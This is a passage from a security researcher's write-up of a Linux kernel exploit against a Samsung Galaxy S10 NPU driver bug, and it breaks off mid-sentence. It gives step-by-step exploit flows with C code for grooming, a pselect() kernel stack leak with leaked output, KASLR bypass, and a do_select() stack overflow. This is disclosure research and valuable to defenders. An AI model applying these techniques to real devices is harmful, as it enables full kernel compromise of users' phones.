These two requirements are in direct conflict: Since the signal frame before the floating-point register state will be accessed in parse_user_sigframe(), the first requirement effectively means we need to put the floating-point state at the very start of the blocking page, so that the values right before can be accessed without triggering the blocking fault. But at the same time, the second requirement forces us to put the floating-point state towards the end of the blocking page so that we can terminate the __arch_copy_from_user() before running off the end of the kernel stack and triggering a panic. It's impossible to satisfy both of these requirements.

At this point I started looking at alternative ways to use our primitive to work around this conflict. In particular, we know that the __arch_copy_from_user() size parameter on entry will be 0x200, that ION buffers have addresses like 0x80xx0000, and that our addition need not be aligned. So, what if we overlapped only the most-significant byte of the ION address with the least-significant byte of the size parameter?

When __arch_copy_to_user() faults, its registers will be spilled to memory in the order X0, X1, X2, and so on. Register X2 holds the size value, which in our case will be 0x200, and X1 stores the userspace address being copied from. If we assume the first 3 bytes of the userspace address are zero, then we get the following layout of X1 and X2 in memory:

          X1            |           X2
UU UU UU UU UU 00 00 00 | 00 02 00 00 00 00 00 00

Then, if we come in with our unaligned addition with a daddr of 0x80610000:

          X1            |           X2
UU UU UU UU UU 00 00 61 | 80 02 00 00 00 00 00 00

Thus, we've effectively increased the value of X2 from 0x200 to 0x280, which should be large enough to corrupt the stack frame of sys_rt_sigreturn() but small enough to avoid running off the end of the kernel stack.

The consequence of using an unaligned addition like this is that we've also corrupted the value of X1, which stores the userspace address from which to copy in the data. Instead of the upper bytes being all 0, the top byte is now nonzero. Quite fortunately, however, this isn't a problem because the kernel was compiled with support for the Top Byte Ignore (TBI) architectural feature enabled for userspace, which means that the top byte of the pointer will be ignored for the purpose of address translation by the CPU.
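
To make the byte overlap concrete, here is a minimal userspace C model of the misaligned addition (the register values and the daddr are illustrative):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    // Model of the spilled register area on the kernel stack: X1 (the
    // userspace source address, top 3 bytes zero) sits directly before
    // X2 (the copy size).
    uint64_t regs[2] = { 0x0000007412345678ULL, 0x200 };
    uint32_t daddr = 0x80610000;  // hypothetical ION device address

    // The vulnerable 32-bit addition, misaligned so that its 4-byte
    // window covers the top 3 bytes of X1 and the low byte of X2.
    unsigned char *window = (unsigned char *)regs + 5;
    uint32_t val;
    memcpy(&val, window, sizeof(val));
    val += daddr;
    memcpy(window, &val, sizeof(val));

    // X1 = 0x6100007412345678 (top byte nonzero, but ignored via TBI)
    // X2 = 0x0000000000000280 (size bumped from 0x200 to 0x280)
    printf("X1 = 0x%016llx\n", (unsigned long long)regs[0]);
    printf("X2 = 0x%016llx\n", (unsigned long long)regs[1]);
    return 0;
}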

This gives us a reasonably complete exploit flow:

  1. Create 2 "blocking pages" using proxy file descriptors.
  2. Map the first blocking page before an unmapped page, and invoke the newuname() syscall with a pointer towards the end of the first blocking page. The copy_to_user() will fault and block, waiting on the corresponding proxy fd (see the sketch after this list).
  3. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_to_user().
  4. Fulfill the requested data on the first proxy fd, allowing the page fault to complete and resuming __arch_copy_to_user(). The copy-out will proceed past the ends of the stack buffer, disclosing the stack cookie and the return address, but stopping at the unmapped page.
  5. Create a fake signal stack frame around a mapping of the second blocking page and invoke the sys_rt_sigreturn() syscall.
  6. sys_rt_sigreturn() will call __copy_from_user() with size 0x200 and fault trying to access the blocking page.
  7. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_from_user(), but align the addition such that only the least significant byte of X2 is changed. This will bump the spilled value from 0x200 to 0x280.
  8. Fulfill the requested data on the second proxy fd, allowing the page fault to complete and resuming __arch_copy_from_user(). The copy-in will overflow the stack buffer, overwriting the return address.
  9. When sys_rt_sigreturn() returns, we will gain code execution.
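
In code, steps 1 and 2 might look roughly like the sketch below (blocking_fd stands in for the proxy file descriptor from step 1, and the placement constants are illustrative):

#include <sys/mman.h>
#include <sys/utsname.h>

// A sketch of steps 1-2, assuming the proxy fd can be mapped: place
// the utsname output so that it starts near the end of the blocking
// page and runs into an unmapped page behind it.
static void block_in_copy_to_user(int blocking_fd) {
    char *region = mmap(NULL, 2 * 0x1000, PROT_READ | PROT_WRITE,
                        MAP_SHARED, blocking_fd, 0);
    munmap(region + 0x1000, 0x1000);  // ensure the next page is unmapped

    // The first access inside uname()'s copy_to_user() faults on the
    // blocking page and stalls until the proxy fd request is serviced;
    // afterwards the copy-out truncates at the unmapped page.
    uname((struct utsname *)(region + 0x1000 - 0x80));
}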

Blocking problems

When I tried to implement this technique, I ran into a fatal problem: I couldn't seem to mmap() the proxy file descriptor in order to create the memory regions that would be used to block copy_to/from_user().

I checked with Jann, and he discovered that the SELinux policy change that would allow mapping the proxy file descriptors was quite recent, and unfortunately too new to be available on my device:

 # For app fuse.
-allow appdomain app_fuse_file:file { getattr read append write };
+allow appdomain app_fuse_file:file { getattr read append write map };

This change was committed in March of 2020, and apparently would not migrate to my device until after the NPU bug I was exploiting had been fixed. Thus, I couldn't rely on blocking copy_to/from_user() after all, and would need to find an alternative target.

Thankfully, due to his copious knowledge of Linux internals, Jann was quickly able to suggest a few different strategies worth investigating. Since this post is already quite long I'll avoid explaining each of them and jump directly to the one that was the most promising: select().

Revisiting the read

Since my previous strategy relied on the blocking memory region for both the stack disclosure (read) and stack buffer overflow (write) steps, I'd need to revisit both of them. But for right now, we'll focus on the read part.

The pselect() system call is an interesting target for our out-of-bounds addition primitive because it will deterministically block before calling copy_to_user() to copy out the contents of a stack buffer. Not only that, but the amount of memory to copy out to userspace is controllable rather than being hardcoded. Thus, we'll have an opportunity to modify the size parameter in a call to copy_to_user() while pselect() is blocked, and increasing the size should cause the kernel to disclose out-of-bounds stack memory.

Here's the relevant code from core_sys_select(), which implements the core logic of the syscall:

int core_sys_select(int n, fd_set __user *inp, fd_set __user *outp,
               fd_set __user *exp, struct timespec64 *end_time)
{
...
    /* Allocate small arguments on the stack to save memory and be faster */
    long stack_fds[SELECT_STACK_ALLOC/sizeof(long)];
...
    /*
     * We need 6 bitmaps (in/out/ex for both incoming and outgoing),
     * since we used fdset we need to allocate memory in units of
     * long-words.
     */
    size = FDS_BYTES(n);
    bits = stack_fds;
    if (size > sizeof(stack_fds) / 6) {
        /* Not enough space in on-stack array; must use kmalloc */
...
        bits = kvmalloc(alloc_size, GFP_KERNEL);
...
    }
    fds.in      = bits;
    fds.out     = bits +   size;
    fds.ex      = bits + 2*size;
    fds.res_in  = bits + 3*size;
    fds.res_out = bits + 4*size;
    fds.res_ex  = bits + 5*size;
    // get_fd_set() calls copy_from_user()
    if ((ret = get_fd_set(n, inp, fds.in)) ||
        (ret = get_fd_set(n, outp, fds.out)) ||
        (ret = get_fd_set(n, exp, fds.ex)))
        goto out;
    zero_fd_set(n, fds.res_in);
    zero_fd_set(n, fds.res_out);
    zero_fd_set(n, fds.res_ex);
    // do_select() may block
    ret = do_select(n, &fds, end_time);
...
    // set_fd_set() calls __copy_to_user()
    if (set_fd_set(n, inp, fds.res_in) ||
        set_fd_set(n, outp, fds.res_out) ||
        set_fd_set(n, exp, fds.res_ex))
        ret = -EFAULT;
...
}

As you can see, the local variable n must be saved to the stack while do_select() blocks, which means that it can be modified before the call to set_fd_set() copies out the corresponding number of bytes to userspace. Also, if n is small, then the 256-byte stack_fds buffer will be used rather than a heap-allocated buffer.

This code actually looks a bit different when compiled in the kernel due to optimization and inlining. In particular, the variable n is not used during the subsequent calls to __arch_copy_to_user(); instead, a hidden variable holding the value 8 * size is allocated to register X22. Thus, wherever X22 gets spilled to the stack during the prologue of do_select(), that's the address we need to target to change the size passed to __arch_copy_to_user().

But there's one other unfortunate consequence we'll have to deal with when moving from the old "blocking page" technique to this new technique: Before, we were modifying the size to be copied out during the execution of __arch_copy_to_user() itself, after all the sanity checks had passed on the original (unmodified) value. Now, however, we're trying to pass the corrupted value directly to __copy_to_user(), which means we'll need to ensure that we don't trip any of the checks. In particular, __copy_to_user() has a call to check_object_size() which will fail if the copy-out extends beyond the bounds of the stack.

Thankfully, we already solved this particular problem when dealing with sys_rt_sigreturn(). Just like in that case, we can set the offset of our out-of-bounds addition such that only the least significant byte of the spilled X22 is modified. But to stay compatible with the write's precondition (the initial value being modified must be smaller than the size of the ION buffer), we need the least significant byte of X22 to be 0.

Because core_sys_select() will stop using the stack_fds buffer if n is too large, this constraint actually admits only a single solution: n = 0. That is, we will need to call select() on 0 file descriptors, which will cause the value X22 = 0 to be stored to the stack when do_select() blocks, at which point we can use our out-of-bounds addition to increase X22 to 0x80.

Thankfully, the logic of core_sys_select() functions just fine with n = 0; even better, the stack_fds buffer is only zeroed for positive n, so bumping the copy-out size to 0x80 will allow us to read uninitialized stack buffer contents. So this technique should allow us to turn the out-of-bounds addition into a useful kernel stack disclosure.
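
For illustration, the victim thread's side of this technique might look roughly like the following sketch (the timeout and output format are illustrative):

#include <stdio.h>
#include <sys/select.h>
#include <time.h>

// A sketch of the victim thread: select on zero fds so that the
// hidden size variable (X22) is 0, then block in do_select() until
// the timeout expires. If the out-of-bounds addition bumps the
// spilled X22 to 0x80 in the meantime, set_fd_set() copies 0x80
// bytes of uninitialized kernel stack into each of these fd_sets.
int main(void) {
    fd_set in, out, ex;
    FD_ZERO(&in); FD_ZERO(&out); FD_ZERO(&ex);
    struct timespec timeout = { .tv_sec = 5, .tv_nsec = 0 };

    int ret = pselect(0, &in, &out, &ex, &timeout, NULL);
    printf("pselect() ret = %d\n", ret);

    // After a successful attack these bitmaps hold leaked kernel stack
    // contents instead of zeroes (an fd_set is exactly 0x80 bytes).
    for (int i = 0; i < 16; i++)
        printf("buf[%02x]: %016lx\n", i * 8, ((unsigned long *)&in)[i]);
    return 0;
}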

Unfortunately, when I began implementing this, I ran into another significant problem. When the prologue of do_select() saves X22 to the stack, it places register X23 right before X22, and X23 contains a kernel pointer at this point. This messes up the precondition for our out-of-bounds addition, because the unaligned value overlapping the least significant byte of X22 will be too large:

          X23           |           X22
XX XX XX XX 80 ff ff ff | 00 00 00 00 00 00 00 00

In order for our precondition to be met, we'd need to have an ION buffer of size at least 0x00ffffff (really, 0x01000000 due to granularity). My impression was that ION memory is quite scarce; is it even possible to allocate an ION buffer that large?

It turns out, yes! I had just assumed that such a large allocation (16 MiB) would fail, but it turns out to work just fine. So, all we have to do is increase the size of the ION buffer initially allocated to 0x1000000, and we should be able to modify register X22.

What about X23, won't that register be corrupted? It will, but thankfully X23 happens to be unused by core_sys_select() after the call to do_select(), so it doesn't actually matter that we clobber it.

At last, we have a viable stack disclosure strategy!

  1. Allocate a 16 MiB ION buffer.
  2. Perform the vmalloc purge using binder fds.
  3. Spray binder vmallocs to consume all vmalloc holes down to size 0x5000, and cause vmalloc() to start allocating from fresh VA space.
  4. Spray thread stacks to fill any remaining 0x5000-byte holes leading up to the fresh VA space.
  5. Map the ION buffer into the fresh VA space by invoking the vulnerable ioctl.
  6. Spray thread stacks; these should land directly after the ION buffer mapping.
  7. Call pselect() from the thread directly after the ION buffer with n = 0; this call will block for the specified timeout.
  8. Call ioctl() on the main thread to perform the out-of-bounds addition, targeting the value of X22 from core_sys_select(). Align the addition to bump the value from 0 to 0x80.
  9. When do_select() unblocks due to timeout expiry, the modified value of X22 will be passed to __copy_to_user(), disclosing uninitialized kernel stack contents to userspace.

And after a few false starts, this strategy turned out to work perfectly:

Samsung NPU driver exploit
ION 0x80850000 [0x01000000]
Allocated ION buffer
Found victim thread!
buf = 0x74ec863b30
pselect() ret = 0 Success
buf[00]:  0000000000000124
buf[08]:  0000000000000015
buf[10]:  ffffffc88f303b80
buf[18]:  ffffff8088adbdd0
buf[20]:  ffffffc89f935e00
buf[28]:  ffffff8088adbd10
buf[30]:  ffffff8088adbda8
buf[38]:  ffffff8088adbd90
buf[40]:  ffffff8008f814e8
buf[48]:  0000000000000000
buf[50]:  ffffffc800000000

By inspecting the leaked buffer contents, it appears that buf[38] is a stack frame pointer and buf[40] is a return address. Thus we now know both the address of the victim stack, from which we can deduce the address of the ION buffer mapping, and the address of a kernel function, which allows us to break KASLR.
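
In code, the post-leak bookkeeping might look something like this (every constant is a placeholder, and the stack alignment and groom-derived offset are assumptions on my part):

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t leaked_ret  = 0xffffff8008f814e8ULL;  // buf[40] from the leak
    uint64_t static_ret  = 0xffffff8008f814e8ULL;  // same return site in the static kernel image (hypothetical)
    uint64_t kaslr_slide = leaked_ret - static_ret;

    uint64_t leaked_fp   = 0xffffff8088adbd90ULL;  // buf[38]: victim frame pointer
    uint64_t stack_base  = leaked_fp & ~0x3fffULL; // assuming 16 KiB kernel stacks
    // Per the heap groom, the ION mapping sits just below the victim
    // thread's stack in VA space (the exact offset is an assumption).
    uint64_t ion_va      = stack_base - 0x1000000;

    printf("slide=0x%llx stack=0x%llx ion=0x%llx\n",
           (unsigned long long)kaslr_slide,
           (unsigned long long)stack_base,
           (unsigned long long)ion_va);
    return 0;
}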

Revisiting the write

Pretty much the only thing left to do is find a way to overflow a stack buffer using our primitive. Once we do this, we should be able to build a ROP chain that will give us some as-yet-unspecified kernel read/write capability.

For now, we won't worry about what to do after the overflow because ROP should be a sufficiently generic technique to implement whatever final read/write capability we want. Admittedly, for an iOS kernel exploit the choice of final capability would have substantial influence on the shape of the exploit flow. But this is because the typical iOS exploit achieves stable kernel read/write before kernel code execution, especially since the arrival of PAC. By contrast, if we can build a stack buffer overflow, we should be able to get ROP execution directly, which is in many ways more powerful than kernel read/write.

Actually, thinking about PAC and iOS gave me an idea.

When a userspace thread enters the kernel, whether due to a system call, page fault, IRQ, or any other reason, the userspace thread's register state needs to be saved in order to be able to resume its execution later. This includes the general-purpose registers X0 - X30 as well as SP, PC, and SPSR ("Saved Program Status Register", alternatively called CPSR or PSTATE). These values get saved to the end of the thread's kernel stack right at the beginning of the exception vector.

When Apple implemented their PAC-based kernel control flow integrity on iOS, they needed to take care that the saved value of SPSR could not be tampered with. The reason is that SPSR is used during exception return to specify the exception level to return to: this could be EL0 when returning to userspace, or EL1 when returning to kernel mode. If SPSR weren't protected, then an attacker with a kernel read/write primitive could modify the saved value of SPSR to cause a thread that would return to userspace (EL0) to instead return to EL1, thereby breaking the kernel's control flow integrity (CFI).

The Samsung Galaxy S10 does not have PAC, and hence SPSR is not protected. This is not a security issue because kernel CFI isn't a security boundary on this device. However, it does mean that this attack could be used to gain kernel code execution.

The idea of targeting the saved SPSR was appealing because we would no longer need the buffer overflow step to execute our ROP payload: assuming we could get an ION buffer allocated with a carefully chosen device address, we could modify SPSR directly using our out-of-bounds addition primitive.

Concretely, when a user thread invokes a syscall, the saved SPSR value might be something like 0x20000000. The least significant 4 bits of SPSR specify the exception level from which the exception was taken: in this case, EL0. A normal kernel thread might have a CPSR value of 0x80400145; in this case, the "5" means that the thread is running at EL1 and on the interrupt stack (SP_EL1).
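
For reference, the relevant mode field can be decoded with a few lines of C (the M[3:0] encodings below are from the ARMv8 reference manual):

#include <stdint.h>
#include <stdio.h>

// Decode SPSR.M[3:0], the field that selects the exception level and
// stack pointer that the exception return will restore.
static const char *spsr_mode(uint64_t spsr) {
    switch (spsr & 0xf) {
    case 0x0: return "EL0t";
    case 0x4: return "EL1t";
    case 0x5: return "EL1h";  // EL1, using SP_EL1
    default:  return "other";
    }
}

int main(void) {
    printf("%s\n", spsr_mode(0x20000000));  // EL0t: normal syscall return
    printf("%s\n", spsr_mode(0x80400145));  // EL1h: kernel thread
    printf("%s\n", spsr_mode(0x20000085));  // EL1h: our corrupted SPSR
    return 0;
}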

Now imagine that we could get our 0x01000000-byte ION buffer allocated with a device address of 0x85000000. We'll also assume that we've somehow already managed to set the user thread's saved PC register to a kernel pointer. The saved user PC and SPSR registers look like this on the stack:

          PC            |          SPSR
XX XX XX 0X 80 FF FF FF | 00 00 00 20 00 00 00 00

Using our out-of-bounds addition primitive to change just the least significant byte of SPSR would yield the following:

          PC            |          SPSR
XX XX XX 0X 80 FF FF FF | 85 00 00 20 00 00 00 00

Hence, we would have changed SPSR from 0x20000000 to 0x20000085, meaning that once the syscall returns, we will start executing at EL1!

Of course, that still leaves a few questions open: How do we get our ION buffer allocated at the desired device address? How do we set the saved PC value to a kernel pointer? We'll address these in turn.

Getting the ION buffer allocated at the desired device address seemed the most urgent, since it is quite integral to this technique. In my testing it seemed that ION buffers had decently (but not perfectly) regular allocation patterns. For example, if you had just allocated an ION buffer of size 0x2000 that had device address 0x80500000, then the next ION buffer was usually allocated with device address 0x80610000.

I played around with the available parameters a lot, hoping to discover an underlying logic that would allow me to deterministically predict ION daddrs. For instance, if the size of the first ION allocation was between 0x1000 and 0x10000 bytes, then the next allocation would usually be made at a device address 0x110000 bytes later, while if the first ION allocation was between 0x11000 and 0x20000 bytes, the next allocation would usually be at a device address 0x120000 bytes later. These patterns seemed to suggest that predictability was tantalizingly close; however, try as I might, I couldn't seem to eliminate the variations from the patterns I observed.

Eventually, by sheer random luck I happened to stumble upon a technique during one of my trials that would quite reliably allocate ION buffers at addresses of my choosing. Thus, we can now assume as part of our out-of-bounds addition primitive that we have control to choose the ION buffer's device address. Furthermore, the mask of available ION daddrs using this technique is much larger than I'd initially thought: 0x[89]xxxx000.

Now, as to the question of how we'll set the saved PC value to a kernel pointer: The simplest approach would just be to jump to that address from userspace; this would work to set the value, but it was not clear to me whether we'd be able to block the thread in the kernel in this state long enough to modify the SPSR using our addition primitive from the main thread. Instead, on recommendation from my team I used the ptrace() API, which via the PTRACE_SETREGSET command provides similar functionality to XNU's thread_set_state().
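
A sketch of that approach on arm64 (error handling omitted; tid is a stopped tracee, and the kernel pointer is whatever we want the saved PC to hold):

#include <elf.h>
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/user.h>

// Overwrite a stopped tracee's saved PC via ptrace so that the spilled
// register state on its kernel stack holds a kernel pointer.
static void set_saved_pc(pid_t tid, uint64_t kernel_ptr) {
    struct user_regs_struct regs;  // arm64: X0-X30, sp, pc, pstate
    struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };

    ptrace(PTRACE_GETREGSET, tid, (void *)NT_PRSTATUS, &iov);
    regs.pc = kernel_ptr;
    ptrace(PTRACE_SETREGSET, tid, (void *)NT_PRSTATUS, &iov);
}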

Total meltdown

My first test after implementing this strategy was to set PC to the address of an instruction that would dereference an invalid memory address. The idea was that running this test should cause a kernel panic right away, since the exception return would start running in kernel mode. Then I could check the panic log to see if all the registers were being set as I expected.

Unfortunately, my first test didn't panic: the syscall whose SPSR was corrupted just seemed to hang, never returning to userspace. And after several seconds of this (during which the phone was fully responsive), the phone would eventually reboot with a message about a watchdog timeout.

This seemed quite bizarre to me. If SPSR wasn't being set properly, the syscall should return to EL0, not EL1, and thus we shouldn't be able to cause any sort of kernel crash. On the other hand, I was certain that PC was set to the address of a faulting instruction, so if SPSR were being set properly, I'd expect a kernel panic, not a hard hang triggering a watchdog timeout. What was going on?

Eventually, Jann and I discovered that this device had the ARM64_UNMAP_KERNEL_AT_EL0 CPU feature (kernel page-table isolation, KPTI) set, which meant that the faulting instruction I was trying to jump to was being unmapped before the syscall return. Working around this seemed more trouble than it was worth: instead, I decided to abandon SPSR and go back to looking for ways to trigger a stack buffer overflow.

Revisiting the write (again)

So, once again I was back to finding a way to use the out-of-bounds addition to create a stack buffer overflow.

This was the part of the exploit development process that I was least enthusiastic about: searching through the Linux code to find specific patterns that would give me the primitives I needed. Choosing to focus on stack frames rather than heap objects certainly helped narrow the search space, but it's still tedious. Thus, I decided to focus on the parts of the kernel I'd already grown familiar with.

The pattern that I was looking for was any place that blocks before copying data to the stack, where the amount of data to be copied was stored in a variable that would be saved during the block. Ideally, this would be a call to copy_from_user(), but I failed to find any useful instances of copy_from_user() being called after a blocking operation.

However, a horrible, horrible idea occurred to me while looking once again at the pselect() syscall, and in particular at the implementation of do_select():

static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
{
...
    retval = 0;
    for (;;) {
...
        inp = fds->in; outp = fds->out; exp = fds->ex;
        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;
        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {
...
            in = *inp++; out = *outp++; ex = *exp++;
            all_bits = in | out | ex;
            if (all_bits == 0) {
                i += BITS_PER_LONG;
                continue;
            }
            for (j = 0; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {
                struct fd f;
                if (i >= n)
                    break;
                if (!(bit & all_bits))
                    continue;
                f = fdget(i);
                if (f.file) {
...
                    if (f_op->poll) {
...
                        mask = (*f_op->poll)(f.file, wait);
                    }
                    fdput(f);
                    if ((mask & POLLIN_SET) && (in & bit)) {
                        res_in |= bit;
                        retval++;
...
                    }
...
                }
            }
            if (res_in)
                *rinp = res_in;
            if (res_out)
                *routp = res_out;
            if (res_ex)
                *rexp = res_ex;
...
        }
...
        if (retval || timed_out || signal_pending(current))
            break;
...
        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,
                       to, slack))
            timed_out = 1;
    }
...
    return retval;
}

pselect() is able to check file descriptors for 3 types of readiness: reading (in fds), writing (out fds), and exceptional conditions (ex fds). If none of the file descriptors in the 3 fdsets are ready for the corresponding operations, then do_select() will block in poll_schedule_timeout() until either the timeout expires or the status of one of the selected fds changes.

Imagine what happens if, while do_select() is blocked in poll_schedule_timeout(), we use our out-of-bounds addition primitive to change the value of n. We already know from our analysis of core_sys_select() that if n was sufficiently small to begin with, then the stack_fds array will be used instead of allocating a buffer on the heap. Thus, in, out, and ex may reside on the stack. Once poll_schedule_timeout() unblocks, do_select() will iterate over all file descriptor numbers from 0 to (the corrupted value of) n. Towards the end of this loop, inp, outp, and exp will be read out-of-bounds, while rinp, routp, and rexp will be written out of bounds. Thus, this is actually a stack buffer overflow. And since the values written to rinp, routp, and rexp are determined based on the readiness of file descriptors, we have at least some hope of controlling the data that gets written.

Sizing the overflow

So, in theory, we could target pselect() to create a stack buffer overflow using our out-of-bounds addition. There are still a lot of steps between that general idea and a working exploit.

Let's begin just by trying to understand the situation we're in a bit more precisely. Looking at the function prologues in IDA, we can determine the stack layout after the stack_fds buffer:

A diagram showing the call stack of core_sys_select(). The topmost stack frame is core_sys_select(), followed by SyS_pselect6(), followed by el0_sync_64.

The stack layout of core_sys_select() and all earlier frames in the call stack. The 256-byte stack_fds buffer out of which we will overflow is 0x348 bytes from the end of the stack and followed by a stack guard and return address.

There are two major constraints we're going to run into with this buffer overflow: controlling the length of the overflow and controlling the contents of the overflow. We'll start with the length.

Based on the depth of the stack_fds buffer in the kernel stack, we can only write 0x348 bytes into the buffer before running off the end of the stack and triggering a kernel panic. If we assume a maximal value of n = 0x140 (which will be important when controlling the contents of the overflow), then that means we need to stop processing at inp = 0x348 - 5 * 0x28 = 0x280 bytes into the buffer, which will position rexp just off the end of the stack. This corresponds to a maximum corrupted value of n of 8 * 0x280 = 0x1400.

So, how do we choose an ION buffer daddr such that adding the daddr into n = 0x140 at some offset will yield a value significantly greater than 0x140 but less than 0x1400?

Unfortunately, the math on this doesn't work out. Even if we choose from the expanded range of ION device addresses 0x[89]xxxx000, there is no address that can be added to 0x140 at a particular offset to produce a 32-bit value between 0x400 and 0x1400.

Nevertheless, we do still have another option available to us: 2 ION buffers! If we can choose the device address of a single ION buffer, theoretically we should be able to repeat the feat to choose the device addresses of 2 ION buffers together; can we find a pair of daddrs that can be added to 0x140 at particular offsets to produce a 32-bit value between 0x400 and 0x1400?

It turns out that adding in a second independent daddr now gives us enough degrees of freedom to find a solution. For example, consider the daddrs 0x8qrst000 and 0x8wxyz000 being added into 0x140 at offsets 0 and +1, respectively. Looking at how the bytes align, it's clear that the only sum less than 0x1400 will be 0x1140. Thus, we can derive a series of relations between the digits:

carry       11   1
+     00 z0 xy 8w
+  00 t0 rs 8q
   40 01 00 00 00 00 00 00
---------------------------
   40 11 00 00 ??

t = 1
s = 0
z+r = 0 OR z+r = 10
ASSUME z+r = 10
1+y+q = 10 => y+q = f
1+x+8 = 10 => x = 7

In this case, we discover that daddrs 0x8qr01000 and 0x8w7yz000 will be a solution so long as q + y = 0xf and r + z = 0x10. For example, 0x81801000 and 0x827e8000 are a solution:

carry       11   1
+     00 80 7e 82
+  00 10 80 81
   40 01 00 00 00 00 00 00
---------------------------
   40 11 00 00 83

corrupted 32-bit n is 0x1140
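
A few lines of C confirm that these two misaligned 32-bit additions produce the expected corrupted n (assuming the offset-0 addition is applied first):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    // The spilled n = 0x140, little-endian, plus one spare byte for
    // the spill-over from the second addition.
    unsigned char mem[9] = { 0x40, 0x01, 0, 0, 0, 0, 0, 0, 0 };
    uint32_t d1 = 0x81801000, d2 = 0x827e8000, v;

    memcpy(&v, mem + 0, 4); v += d1; memcpy(mem + 0, &v, 4);  // offset 0
    memcpy(&v, mem + 1, 4); v += d2; memcpy(mem + 1, &v, 4);  // offset +1

    uint32_t n;
    memcpy(&n, mem, 4);
    printf("corrupted n = 0x%x\n", n);  // 0x1140
    return 0;
}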

So, we'll need to tweak our original heap groom slightly to map both ION buffers back-to-back before spraying the kernel thread stacks.

Controlling the contents

Using 2 ION buffers with carefully chosen device addresses allows us to control the size of the stack buffer overflow. Meanwhile, the contents of the overflow are the output of the pselect() syscall, which we can control because we can control which file descriptors in our process are ready for various types of operations. But once we overflow past the original value of n, we run into a problem: we start reading our input data from the data previously written to the output buffer.

A diagram showing the progression of the stack buffer overflow out of the stack_fds buffer and down the stack.

Corrupting the value of n will cause do_select() to keep processing inp, outp, and exp past their original bounds. Eventually the output cursor rinp will start overflowing out of the stack_fds buffer entirely, overwriting the return address. But before that happens, inp will start consuming the previous output of rinp.

To make the analysis simpler, we can ignore out, ex, rout, and rex to focus exclusively on in and rin. The reason for this is that rout and rex will eventually be overwritten by rin, so it doesn't really matter what they write; if the overflow continues for a sufficient distance, only the output of rin matters.

Using the assumed value of n = 0x140, each of the in, out, ex, rin, rout, rex buffers is 0x28 bytes, so after processing 3 * n = 0x3c0 file descriptors, inp (the input pointer) will start reading from rin (the output buffer), and this will continue as the out-of-bounds write progresses down the stack. By the semantics of select(), each bit in rinp is only written with a 1 if both the corresponding bit in inp was a 1 and the corresponding file descriptor was readable. Thus, once we've written a 0 bit at any location, every bit at a multiple of 0x3c0 bits later will also be 0. This introduces a natural cycle in our overflow that constrains the output.

It's also worth noting that if you look back at do_select(), rinp is only written if the full 64-bit value to write is nonzero. Thus, if any 64-bit output value is 0 (i.e., all 64 fds in the long are either not selected on or not readable), then the corresponding stack location will be left intact.

A diagram showing the cyclical dependency of bit values that can be written using this buffer overflow. In order to set bit X to 1, we need to ensure that bit X - 0x3c0 is also 1 and that file descriptor X - 0x3c0 is readable. If X - 0x3c0 is 0, then do_select() will not select on file descriptor X - 0x3c0, and the output at X will be 0; however, if all 64 output bits in X's long are 0, then no output is written and the value of X will be unchanged.

Because of the 3 * 0x28 = 0x78-byte cycle length, we can treat this primitive as the ability to write up to 15 controlled 64-bit values into the stack, each at a unique offset modulo 0x78, while leaving stack values at the remaining offsets modulo 0x78 intact. This is a conservative simplification, since our primitive is somewhat more flexible than this, but it's useful to visualize our primitive this way.

Under this simplification, we can describe the out-of-bounds write as 15 (offset, value) pairs, where offset is the offset from the start of the stack_fds array in bytes (which must be a multiple of 8 and must be unique mod 0x78) and value is the 64-bit value to be written at that offset. For each (offset, value) pair, we need to set to 1 every bit in each "preimage" of value from an earlier cycle.

To simplify things even further, let's regard the concatenation of the input fdsets in, out, and ex as a single input fdset, just as it appears on the kernel stack in the stack_fds buffer once we've corrupted n.

The simplest solution is to have the "preimage" of each value be value itself, which can be done by setting the portion of the input fdset at offset % 0x78 to value for each (offset, value) pair and by making every file descriptor from 0 to 0x1140 be readable. Since we'll only be selecting on the fds that correspond to 1 bits in value and since every fd is readable, this will mirror the entire input buffer (consisting of the 15 values at their corresponding offsets) down the kernel stack repeatedly. This will trivially ensure that value gets placed at offset because value will be written to every offset in the kernel stack that is the same as offset mod 0x78.

A diagram showing the input buffer being repeatedly mirrored down the stack.

By making all of the first 0x1140 file descriptors readable, the input buffer's 15 longs will be mirrored down the stack, repeating every 0x3c0 bits.
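
In code, preparing the combined input bitmap for this mirroring approach might look like the following sketch (the struct and function names are hypothetical):

#include <stdint.h>
#include <string.h>

struct write_pair {
    uint32_t offset;  // byte offset from the start of stack_fds
    uint64_t value;   // 64-bit value to write at that offset
};

// Place each value at its offset mod 0x78 in the concatenated in/out/ex
// input bitmap; with every fd readable, do_select() then mirrors this
// 0x78-byte pattern down the kernel stack.
static void build_input_fdset(uint8_t input[0x78],
                              const struct write_pair *pairs, int count) {
    memset(input, 0, 0x78);
    for (int i = 0; i < count; i++)
        memcpy(input + pairs[i].offset % 0x78, &pairs[i].value, 8);
}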

Using a slightly more complicated solution, however, we can limit the depth of the stack corruption. Instead, we'll have the preimage of each value be ~0 (i.e., all 64 bits set), and use the readability of each file descriptor to control the bits that get written. That way, once we've written the value at the correct offset, the fds corresponding to subsequent cycles can be made non-readable, thereby preventing the corruption from continuing down the stack past the desired depth of each write.

This still leaves one more question about the mechanics of the stack buffer overflow: poll_schedule_timeout() will return as soon as any file descriptor becomes readable, so how can we make sure that all the fds for all the 1 bits become readable at the same time? Fortunately this has an easy solution: create 2 pipes, one for all 0 bits and one for all 1 bits, and use dup2() to make all the fds we'll be selecting on be duplicates of the read ends of these pipes. Writing data to the "1 bits" pipe will cause poll_schedule_timeout() to unblock and all the "1 bits" fds will be readable (since they're all dups of the same underlying file). The only thing we need to be careful about is to ensure that at least one of the original in file descriptors (fds 0-0x13f) is a "1 bit" dup, or else poll_schedule_timeout() won't notice the status change when we write to the "1 bits" pipe.
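
Here is a sketch of that file descriptor setup (the fd numbers and bit pattern are illustrative):

#include <unistd.h>

// Alias every fd we will select on to the read end of one of two
// pipes, so that a single write makes all of the "1 bit" fds readable
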